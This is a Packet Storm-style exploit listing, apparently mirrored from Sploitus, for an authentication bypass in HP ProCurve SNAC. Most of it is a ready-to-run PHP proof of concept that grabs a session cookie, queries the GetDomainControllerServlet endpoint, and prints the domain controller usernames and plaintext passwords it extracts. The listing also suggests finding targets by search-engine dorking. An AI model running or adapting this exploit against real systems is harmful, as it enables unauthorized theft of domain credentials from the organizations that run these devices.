Share
## https://sploitus.com/exploit?id=PACKETSTORM:213260
=============================================================================================================================================
    | # Title     : HP ProCurve 4.00 Credential Dumping Vulnerability                                                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://support.hpe.com/hpesc/public/docDisplay?docId=c02619966&docLocale=en_US                                             |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description: Performing a Credential Dumping attack against vulnerable HP ProCurve SNAC systems. 
    
        Bypass Authentication in HP ProCurve SNAC to Extract Domain Controller Data
    
       (Related : https://packetstorm.news/files/id/180690/ Linked CVE numbers: ) .
    	
    [+] save code as poc.php.
    
    [+] Set target : line 86
    
    [+] PayLoad :
    
    <?php
    
    class HPSNACExploit {
        private $target;
        private $port;
        
        public function __construct($target, $port = 443) {
            $this->target = $target;
            $this->port = $port;
        }
        
        private function sendRequest($url, $cookies = "") {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, "https://{$this->target}:{$this->port}{$url}");
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
            if (!empty($cookies)) {
                curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: $cookies"]);
            }
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
        
        public function getSession() {
            $response = $this->sendRequest("/RegWeb/html/snac/index.html");
            preg_match_all('/Set-Cookie: (.*?);/i', $response, $matches);
            return isset($matches[1]) ? implode("; ", $matches[1]) : null;
        }
        
        public function getDomainInfo($session) {
            $response = $this->sendRequest("/RegWeb/RegWeb/GetDomainControllerServlet", $session);
            return (strpos($response, 'domainName') !== false) ? $response : null;
        }
        
        public function parseDomainData($xmlData) {
            $credentials = [];
            $xml = simplexml_load_string($xmlData);
            if ($xml && isset($xml->Controllers->Domain)) {
                foreach ($xml->Controllers->Domain as $domain) {
                    $credentials[] = [
                        'ip' => (string) $domain->domainControllerIP,
                        'port' => (string) $domain->port,
                        'service' => (string) $domain->connType,
                        'user' => (string) $domain->userName,
                        'password' => (string) $domain->password
                    ];
                }
            }
            return $credentials;
        }
        
        public function exploit() {
            echo "[*] Trying to get session...\n";
            $session = $this->getSession();
            if (!$session) {
                echo "[-] Failed to obtain session. Target may not be vulnerable.\n";
                return;
            }
            
            echo "[*] Exploiting authentication bypass...\n";
            $domainInfo = $this->getDomainInfo($session);
            if (!$domainInfo) {
                echo "[-] Exploit failed. Target may not be vulnerable.\n";
                return;
            }
            
            echo "[*] Parsing extracted data...\n";
            $credentials = $this->parseDomainData($domainInfo);
            if (empty($credentials)) {
                echo "[!] No domain controllers found.\n";
                return;
            }
            
            echo "[+] Credentials found:\n";
            foreach ($credentials as $cred) {
                echo "Domain Controller: {$cred['ip']}:{$cred['port']} ({$cred['service']})\n";
                echo "Username: {$cred['user']}\n";
                echo "Password: {$cred['password']}\n";
                echo "-----------------------------------------\n";
            }
        }
    }
    
    $exploit = new HPSNACExploit("target.com");
    $exploit->exploit();
    
    ?>
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================